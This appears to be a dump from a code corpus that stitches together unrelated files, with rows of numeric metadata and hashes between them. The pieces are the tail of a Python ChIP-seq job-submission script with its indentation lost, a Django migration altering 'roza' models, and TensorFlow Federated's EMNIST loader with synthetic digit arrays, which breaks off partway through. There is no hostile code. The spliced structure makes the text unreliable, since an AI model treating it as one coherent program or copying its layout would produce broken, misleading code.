subprocess.call(["qsub", workspace + "pos2bed.sh", sample_dir + input_tag_folder + "/regions.txt",
sample_dir + input_tag_folder + "/output.bed"])
else:
chip_tag_folder = sample_file.get("filename")[:sample_file.get("filename").find(",")][:-6]
input_tag_folder = sample_file.get("filename")[sample_file.get("filename").find(",") + 2:][:-6]
group_tag_folder = chip_tag_folder + "_vs_" + input_tag_folder
if style == "factor":
subprocess.call(["qsub", workspace + "pos2bed.sh", sample_dir + group_tag_folder + "/peaks.txt",
sample_dir + group_tag_folder + "/output.bed"])
if style == "histone":
subprocess.call(["qsub", workspace + "pos2bed.sh", sample_dir + group_tag_folder + "/regions.txt",
sample_dir + group_tag_folder + "/output.bed"])
PBSTracker.trackPBSQueue(1, "pos2bed")
## find motifs genome
def find_motifs_genome(workflow, project_name, sample_list, style, genome):
    """Queue find_motifs_genome.sh over each sample's peaks/regions file.

    Results land in a MotifOutput/ subfolder; layout mirrors find_peaks.
    """
    workspace = root_dir + "/" + workflow + "/scripts/"
    sample_dir = data_dir + "/" + project_name + "/" + workflow + "/"
    print "executing find_motifs_genome..."
    for sample_file in sample_list:
        if sample_file.get("filename").find(",") < 0:
            input_tag_folder = sample_file.get("filename")[:-6]
            if style == "factor":
                subprocess.call(["qsub", workspace + "find_motifs_genome.sh", sample_dir + input_tag_folder + "/peaks.txt",
                                 sample_dir + input_tag_folder + "/MotifOutput/", genome])
            if style == "histone":
                subprocess.call(["qsub", workspace + "find_motifs_genome.sh", sample_dir + input_tag_folder + "/regions.txt",
                                 sample_dir + input_tag_folder + "/MotifOutput/", genome])
        else:
            chip_tag_folder = sample_file.get("filename")[:sample_file.get("filename").find(",")][:-6]
            input_tag_folder = sample_file.get("filename")[sample_file.get("filename").find(",") + 2:][:-6]
            group_tag_folder = chip_tag_folder + "_vs_" + input_tag_folder
            if style == "factor":
                subprocess.call(["qsub", workspace + "find_motifs_genome.sh", sample_dir + group_tag_folder + "/peaks.txt",
                                 sample_dir + group_tag_folder + "/MotifOutput/", genome])
            if style == "histone":
                subprocess.call(["qsub", workspace + "find_motifs_genome.sh", sample_dir + group_tag_folder + "/regions.txt",
                                 sample_dir + group_tag_folder + "/MotifOutput/", genome])
    PBSTracker.trackPBSQueue(1, "find_motif")
## uploading resulting files to s3.
def upload_files(workflow, project_name, s3_output_files_address):
    """Queue one upload.sh job pushing the whole sample dir back to S3."""
    print "executing upload files..."
    workspace = root_dir + "/" + workflow + "/scripts/"
    sample_dir = data_dir + "/" + project_name + "/" + workflow + "/"
    subprocess.call(["qsub", workspace + "upload.sh", sample_dir, s3_output_files_address + "/" + project_name + "/" + workflow])
    PBSTracker.trackPBSQueue(1, "upload")
if __name__ == '__main__':
    #yaml_file = "/Users/guorongxu/Desktop/workspace/projects/jupyter-genomics_bitbucket/src/awsCluster/chipSeq/Sample_cDNA.yaml"
    # CLI entry point: the single positional argument is the workflow YAML config.
    yaml_file = sys.argv[1]
    run_analysis(yaml_file)
| 50.898693
| 129
| 0.614575
| 1,788
| 15,575
| 5.044743
| 0.068792
| 0.074834
| 0.083592
| 0.128049
| 0.801774
| 0.796452
| 0.78337
| 0.749778
| 0.704435
| 0.688581
| 0
| 0.00793
| 0.238909
| 15,575
| 305
| 130
| 51.065574
| 0.752995
| 0.03435
| 0
| 0.515021
| 0
| 0
| 0.170686
| 0.028781
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.017167
| null | null | 0.064378
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
eb7b5fe95eb714fbb25f3efa3b45940a694c9342
| 83
|
py
|
Python
|
bibbutler_web/models/__init__.py
|
dolonnen/bibbuttler
|
a9f672d0321fa6d060e204ecc952ed333edc1d81
|
[
"MIT"
] | null | null | null |
bibbutler_web/models/__init__.py
|
dolonnen/bibbuttler
|
a9f672d0321fa6d060e204ecc952ed333edc1d81
|
[
"MIT"
] | null | null | null |
bibbutler_web/models/__init__.py
|
dolonnen/bibbuttler
|
a9f672d0321fa6d060e204ecc952ed333edc1d81
|
[
"MIT"
] | null | null | null |
from bibbutler_web.models.general import *
from bibbutler_web.models.entry import *
| 41.5
| 42
| 0.843373
| 12
| 83
| 5.666667
| 0.583333
| 0.382353
| 0.470588
| 0.647059
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.084337
| 83
| 2
| 43
| 41.5
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
ebcc817803d04787734db724b3b76d19ca86369b
| 8,304
|
py
|
Python
|
roza/migrations/0012_auto_20210419_1547.py
|
sahin88/roza-tex
|
a05fdcaac7ba0e609e579d60a20ff9b13d824c64
|
[
"Unlicense"
] | null | null | null |
roza/migrations/0012_auto_20210419_1547.py
|
sahin88/roza-tex
|
a05fdcaac7ba0e609e579d60a20ff9b13d824c64
|
[
"Unlicense"
] | null | null | null |
roza/migrations/0012_auto_20210419_1547.py
|
sahin88/roza-tex
|
a05fdcaac7ba0e609e579d60a20ff9b13d824c64
|
[
"Unlicense"
] | null | null | null |
# Generated by Django 3.1.7 on 2021-04-19 15:47
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
    """Replace the ``Home``/``NewsFeed`` models with ``homep``/``newsfeed_model``
    and relax most text columns to optional (``blank=True``) fields.

    Originally auto-generated by Django 3.1.7 on 2021-04-19 15:47; the thirty
    near-identical ``product`` AlterField operations are built from a table
    below instead of being spelled out one by one.
    """

    dependencies = [
        ('roza', '0011_auto_20210324_2254'),
    ]

    # (field name, max_length) for every ``product`` column that becomes an
    # optional CharField. NOTE: 'coathing' and 'patern' are the spellings the
    # existing database columns use, so they must stay exactly as written.
    _PRODUCT_CHAR_FIELDS = [
        ('bondings', 50),
        ('cd_tensile_strength_unit', 50),
        ('cd_tensile_strength_value', 50),
        ('coathing_unit', 50),
        ('coathing_value', 50),
        ('constructions', 50),
        ('core_size_unit', 50),
        ('core_size_value', 50),
        ('elongation_at_break_unit', 50),
        ('elongation_at_break_value', 50),
        ('md_tensile_strength_unit', 50),
        ('md_tensile_strength_value', 50),
        ('patern_unit', 50),
        ('patern_value', 50),
        ('patterns', 50),
        ('product_name', 255),
        ('role_length_unit', 50),
        ('role_length_value', 50),
        ('role_width_unit', 50),
        ('role_width_value', 50),
        ('warp_yarn_unit', 50),
        ('warp_yarn_value', 50),
        ('weft_yarn_unit', 50),
        ('weft_yarn_value', 50),
        ('weight_unit', 50),
        ('weight_value', 50),
        ('yarns_type', 50),
    ]

    operations = [
        migrations.CreateModel(
            name='homep',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('image1', models.ImageField(blank=True, upload_to='home/images')),
                ('msg1', models.CharField(blank=True, max_length=255)),
                ('image2', models.ImageField(blank=True, upload_to='home/images')),
                ('msg2', models.CharField(blank=True, max_length=255)),
                ('image3', models.ImageField(blank=True, upload_to='home/images')),
                ('msg3', models.CharField(blank=True, max_length=255)),
            ],
        ),
        migrations.CreateModel(
            name='newsfeed_model',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('image1', models.ImageField(blank=True, null=True, upload_to='home/bottom/images')),
                ('title', models.CharField(blank=True, max_length=255)),
                ('description', models.TextField(blank=True)),
            ],
        ),
        migrations.DeleteModel(
            name='Home',
        ),
        migrations.DeleteModel(
            name='NewsFeed',
        ),
        migrations.AlterField(
            model_name='about',
            name='description',
            field=models.TextField(blank=True),
        ),
        # preserve_default=False below: the ``timezone.now`` defaults are
        # one-off values used only to back-fill existing rows; they are not
        # kept in the model state.
        migrations.AlterField(
            model_name='about',
            name='image',
            field=models.ImageField(blank=True, default=django.utils.timezone.now, upload_to='about/images'),
            preserve_default=False,
        ),
        migrations.AlterField(
            model_name='about',
            name='title',
            field=models.CharField(blank=True, default=django.utils.timezone.now, max_length=255),
            preserve_default=False,
        ),
        migrations.AlterField(
            model_name='application',
            name='application_field',
            field=models.CharField(blank=True, default=django.utils.timezone.now, max_length=255),
            preserve_default=False,
        ),
        migrations.AlterField(
            model_name='application',
            name='description1',
            field=models.TextField(blank=True, default=django.utils.timezone.now),
            preserve_default=False,
        ),
        migrations.AlterField(
            model_name='application',
            name='description3',
            field=models.TextField(blank=True, default=django.utils.timezone.now),
            preserve_default=False,
        ),
        migrations.AlterField(
            model_name='application',
            name='title1',
            field=models.CharField(blank=True, default=django.utils.timezone.now, max_length=255),
            preserve_default=False,
        ),
        migrations.AlterField(
            model_name='application',
            name='title2',
            field=models.CharField(blank=True, default=django.utils.timezone.now, max_length=255),
            preserve_default=False,
        ),
        migrations.AlterField(
            model_name='application',
            name='title3',
            field=models.CharField(blank=True, max_length=255),
        ),
    ] + [
        # One AlterField per entry of _PRODUCT_CHAR_FIELDS, in table order
        # (only the outermost iterable of this comprehension may reference a
        # class-level name, which is exactly what happens here).
        migrations.AlterField(
            model_name='product',
            name=field_name,
            field=models.CharField(blank=True, max_length=length),
        )
        for field_name, length in _PRODUCT_CHAR_FIELDS
    ]
| 36.262009
| 114
| 0.564186
| 791
| 8,304
| 5.744627
| 0.131479
| 0.089129
| 0.158451
| 0.190141
| 0.885123
| 0.871259
| 0.852553
| 0.809639
| 0.764305
| 0.764305
| 0
| 0.022023
| 0.316474
| 8,304
| 228
| 115
| 36.421053
| 0.778541
| 0.005419
| 0
| 0.734234
| 1
| 0
| 0.115417
| 0.020589
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.009009
| 0
| 0.022523
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
15dad19d072862c2bc73fdf6995425b9976142b2
| 23,967
|
py
|
Python
|
tensorflow_federated/python/simulation/datasets/emnist.py
|
alessiomora/federated
|
3b501067ed7062aaec3cc8830aaec0a7cf8f0942
|
[
"Apache-2.0"
] | 1,918
|
2019-02-22T21:17:28.000Z
|
2022-03-30T14:49:53.000Z
|
tensorflow_federated/python/simulation/datasets/emnist.py
|
alessiomora/federated
|
3b501067ed7062aaec3cc8830aaec0a7cf8f0942
|
[
"Apache-2.0"
] | 999
|
2019-02-22T21:47:44.000Z
|
2022-03-31T11:06:42.000Z
|
tensorflow_federated/python/simulation/datasets/emnist.py
|
alessiomora/federated
|
3b501067ed7062aaec3cc8830aaec0a7cf8f0942
|
[
"Apache-2.0"
] | 498
|
2019-02-22T21:17:56.000Z
|
2022-03-29T02:54:15.000Z
|
# Copyright 2019, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Libraries for the federated EMNIST dataset for simulation."""
import collections
import tensorflow as tf
from tensorflow_federated.python.simulation.datasets import download
from tensorflow_federated.python.simulation.datasets import from_tensor_slices_client_data
from tensorflow_federated.python.simulation.datasets import sql_client_data
def _add_proto_parsing(dataset: tf.data.Dataset) -> tf.data.Dataset:
  """Appends deserialization of serialized `tf.Example` protos to `dataset`.

  Args:
    dataset: A `tf.data.Dataset` of serialized example protos.

  Returns:
    A dataset of `collections.OrderedDict` elements with an int32 'label'
    and a float32 [28, 28] 'pixels' tensor.
  """
  # Fixed feature schema of the EMNIST example protos.
  feature_spec = {
      'pixels': tf.io.FixedLenFeature(shape=(28, 28), dtype=tf.float32),
      'label': tf.io.FixedLenFeature(shape=(), dtype=tf.int64),
  }

  def _parse(serialized_proto):
    example = tf.io.parse_example(serialized_proto, feature_spec)
    # Downcast the label and emit keys in lexicographic order.
    return collections.OrderedDict(
        label=tf.cast(example['label'], tf.int32),
        pixels=example['pixels'])

  return dataset.map(_parse, num_parallel_calls=tf.data.AUTOTUNE)
def load_data(only_digits=True, cache_dir=None):
  """Loads the Federated EMNIST dataset.

  Downloads and caches the dataset locally; a previously downloaded copy is
  reused when available.

  The data is derived from the Leaf repository
  (https://github.com/TalwalkarLab/leaf) pre-processing of the Extended MNIST
  dataset, grouping examples by writer ("LEAF: A Benchmark for Federated
  Settings", https://arxiv.org/abs/1812.01097). Unlike some MNIST variants,
  no size-normalization or centering is applied, and the pixel encoding is
  inverted: 1.0 is the background and 0.0 the color of the digit.

  Data set sizes:

  *only_digits=True*: 3,383 users, 10 label classes
    - train: 341,873 examples
    - test: 40,832 examples
  *only_digits=False*: 3,400 users, 62 label classes
    - train: 671,585 examples
    - test: 77,483 examples

  Each user's examples are split across _train_ and _test_ (rather than
  holding out whole users), so every user has at least one example in each
  split; writers with fewer than 2 examples were excluded.

  The `tf.data.Datasets` returned by
  `tff.simulation.datasets.ClientData.create_tf_dataset_for_client` yield
  `collections.OrderedDict` objects with keys, in lexicographic order:

    - `'label'`: an int32 `tf.Tensor`. Labels [0-9] are the digit classes,
      [10-35] the uppercase classes (e.g., label 11 is 'B'), and [36-61]
      the lowercase classes (e.g., label 37 is 'b').
    - `'pixels'`: a float32 `tf.Tensor` of shape [28, 28] holding the
      handwritten digit, values in [0.0, 1.0].

  Args:
    only_digits: (Optional) whether to restrict to the digit [0-9] classes.
      If `False`, lower and upper case characters are included, for 62
      classes in total.
    cache_dir: (Optional) directory to cache the downloaded file. If `None`,
      caches in Keras' default cache directory.

  Returns:
    Tuple of (train, test) where the tuple elements are
    `tff.simulation.datasets.ClientData` objects.
  """
  database_path = download.get_compressed_file(
      origin='https://storage.googleapis.com/tff-datasets-public/emnist_all.sqlite.lzma',
      cache_dir=cache_dir)
  # Each split lives in its own SQL table; pick the table pair matching
  # `only_digits`.
  table_prefix = 'digits_only' if only_digits else 'all'
  train_client_data = sql_client_data.SqlClientData(
      database_path, table_prefix + '_train').preprocess(_add_proto_parsing)
  test_client_data = sql_client_data.SqlClientData(
      database_path, table_prefix + '_test').preprocess(_add_proto_parsing)
  return train_client_data, test_client_data
def get_synthetic():
  """Returns a small synthetic federated EMNIST dataset for testing.

  The single client produced ('synthetic') holds exactly 10 examples, one
  per digit label, derived from a fixed set of hard-coded images.

  Returns:
    A `tff.simulation.datasets.ClientData` object that matches the
    characteristics (other than size) of those provided by
    `tff.simulation.datasets.emnist.load_data`.
  """
  synthetic_client_map = {'synthetic': _get_synthetic_digits_data()}
  return from_tensor_slices_client_data.TestClientData(synthetic_client_map)
def _get_synthetic_digits_data():
  """Returns a dictionary suitable for `tf.data.Dataset.from_tensor_slices`.

  Returns:
    A dictionary that matches the structure of the data produced by
    `tff.simulation.datasets.emnist.load_data`, with keys (in lexicographic
    order) `label` and `pixels`.
  """
  # Scale each hard-coded 0-9 intensity image into the [0.0, 1.0] range used
  # by the real dataset, then stack into a single [10, 28, 28] tensor.
  pixels = tf.stack(
      [tf.constant(image, dtype=tf.float32) / 9.0
       for image in _SYNTHETIC_DIGITS_DATA],
      axis=0)
  labels = tf.constant(range(10), dtype=tf.int32)
  return collections.OrderedDict(label=labels, pixels=pixels)
# pyformat: disable
# pylint: disable=bad-continuation,bad-whitespace
# Ten hand-drawn 28x28 digit images, one per label 0-9, on a 0-9 intensity
# scale (9 = background, 0 = darkest ink; the values are divided by 9.0 in
# `_get_synthetic_digits_data` to map them into [0.0, 1.0]).
_SYNTHETIC_DIGITS_DATA = [
    # Digit 0.
    [[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,7,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,4,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,7,4,2,0,2,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,7,4,2,0,2,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,4,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,7,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9]],
    # Digit 1.
    [[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,7,4,4,4,7,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,7,4,4,4,2,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,7,4,4,4,2,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,7,4,4,4,2,0,0,0,2,4,4,4,7,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,0,0,0,0,0,0,0,0,4,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,7,4,4,4,4,4,4,4,4,4,4,4,7,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9]],
    # Digit 2.
    [[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,7,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,4,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,7,4,2,0,2,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,7,4,4,4,7,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,7,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,7,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,7,4,2,0,2,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,2,4,2,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,0,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,7,4,4,4,4,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9]],
    # Digit 3.
    [[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,7,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,4,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,7,4,2,0,2,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,7,4,4,4,7,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,7,4,4,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,4,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,7,4,4,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,7,4,4,4,7,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,7,4,2,0,2,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,4,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,7,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9]],
    # Digit 4.
    [[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
